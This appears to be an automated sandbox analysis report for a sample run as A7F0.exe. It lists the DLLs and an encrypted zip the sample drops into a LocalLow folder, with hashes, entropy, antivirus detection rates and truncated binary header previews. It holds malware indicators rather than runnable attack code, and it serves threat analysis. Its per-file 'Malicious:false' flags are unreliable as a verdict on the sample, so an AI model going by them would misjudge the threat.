                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&|.J...K&|.J...K&|uK...K&|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19920
                                                                                                                                                    Entropy (8bit):6.2121285323374185
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                                                                    MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                                                                    SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                                                                    SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                                                                    SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19920
                                                                                                                                                    Entropy (8bit):6.2121285323374185
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
                                                                                                                                                    MD5:7CD244C3FC13C90487127B8D82F0B264
                                                                                                                                                    SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
                                                                                                                                                    SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
                                                                                                                                                    SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):117712
                                                                                                                                                    Entropy (8bit):6.598338256653691
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
                                                                                                                                                    MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
                                                                                                                                                    SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
                                                                                                                                                    SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
                                                                                                                                                    SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{*7.{*7.{*..x+>.{*..~+I.{*...+%.{*.x+$.{*..+'.{*.~+..{*..z+4.{*7.z*A.{*..~+>.{*..{+6.{*...*6.{*..y+6.{*Rich7.{*........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2828315
                                                                                                                                                    Entropy (8bit):7.998625956067725
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                                                                                    MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                                                                                    SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                                                                                    SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                                                                                    SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K.*...........gr..L..*H...v....6[*...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3.*...S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.|k.5...XF.Y..lVVW..C..|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..|!......O....M....>.>.$\.%..L.zF.l...3
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):334288
                                                                                                                                                    Entropy (8bit):6.808908775107082
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
                                                                                                                                                    MD5:60ACD24430204AD2DC7F148B8CFE9BDC
                                                                                                                                                    SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
                                                                                                                                                    SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
                                                                                                                                                    SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):132048
                                                                                                                                                    Entropy (8bit):6.627391684128337
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
                                                                                                                                                    MD5:5A49EBF1DA3D5971B62A4FD295A71ECF
                                                                                                                                                    SHA1:40917474EF7914126D62BA7CDBF6CF54D227AA20
                                                                                                                                                    SHA-256:2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
                                                                                                                                                    SHA-512:A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S|.>R..?S;..S..?S|.<R..?S|.:R..?S|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20432
                                                                                                                                                    Entropy (8bit):6.337521751154348
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
                                                                                                                                                    MD5:4FE544DFC7CDAA026DA6EDA09CAD66C4
                                                                                                                                                    SHA1:85D21E5F5F72A4808F02F4EA14AA65154E52CE99
                                                                                                                                                    SHA-256:3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
                                                                                                                                                    SHA-512:5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55760
                                                                                                                                                    Entropy (8bit):6.738700405402967
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
                                                                                                                                                    MD5:56E982D4C380C9CD24852564A8C02C3E
                                                                                                                                                    SHA1:F9031327208176059CD03F53C8C5934C1050897F
                                                                                                                                                    SHA-256:7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
                                                                                                                                                    SHA-512:92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22480
                                                                                                                                                    Entropy (8bit):6.528357540966124
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
                                                                                                                                                    MD5:96B879B611B2BBEE85DF18884039C2B8
                                                                                                                                                    SHA1:00794796ACAC3899C1FB9ABBF123FEF3CC641624
                                                                                                                                                    SHA-256:7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
                                                                                                                                                    SHA-512:DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):92624
                                                                                                                                                    Entropy (8bit):6.639527605275762
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
                                                                                                                                                    MD5:94919DEA9C745FBB01653F3FDAE59C23
                                                                                                                                                    SHA1:99181610D8C9255947D7B2134CDB4825BD5A25FF
                                                                                                                                                    SHA-256:BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
                                                                                                                                                    SHA-512:1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):24016
                                                                                                                                                    Entropy (8bit):6.532540890393685
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
                                                                                                                                                    MD5:6099C438F37E949C4C541E61E88098B7
                                                                                                                                                    SHA1:0AD03A6F626385554A885BD742DFE5B59BC944F5
                                                                                                                                                    SHA-256:46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
                                                                                                                                                    SHA-512:97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16336
                                                                                                                                                    Entropy (8bit):6.437762295038996
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
                                                                                                                                                    MD5:F3A355D0B1AB3CC8EFFCC90C8A7B7538
                                                                                                                                                    SHA1:1191F64692A89A04D060279C25E4779C05D8C375
                                                                                                                                                    SHA-256:7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
                                                                                                                                                    SHA-512:6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):144848
                                                                                                                                                    Entropy (8bit):6.54005414297208
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
                                                                                                                                                    MD5:4E8DF049F3459FA94AB6AD387F3561AC
                                                                                                                                                    SHA1:06ED392BC29AD9D5FC05EE254C2625FD65925114
                                                                                                                                                    SHA-256:25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
                                                                                                                                                    SHA-512:3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1142072
                                                                                                                                                    Entropy (8bit):6.809041027525523
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                                                                                                    MD5:D6326267AE77655F312D2287903DB4D3
                                                                                                                                                    SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                                                                                                    SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                                                                                                    SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):83784
                                                                                                                                                    Entropy (8bit):6.890347360270656
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                                    MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                                    SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                                    SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                                    SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):916735
                                                                                                                                                    Entropy (8bit):6.514932604208782
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                                                                                    MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                                                                                    SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                                                                                    SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                                                                                    SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3F71.exe.log
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):700
                                                                                                                                                    Entropy (8bit):5.346524082657112
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                    MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                    SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                    SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
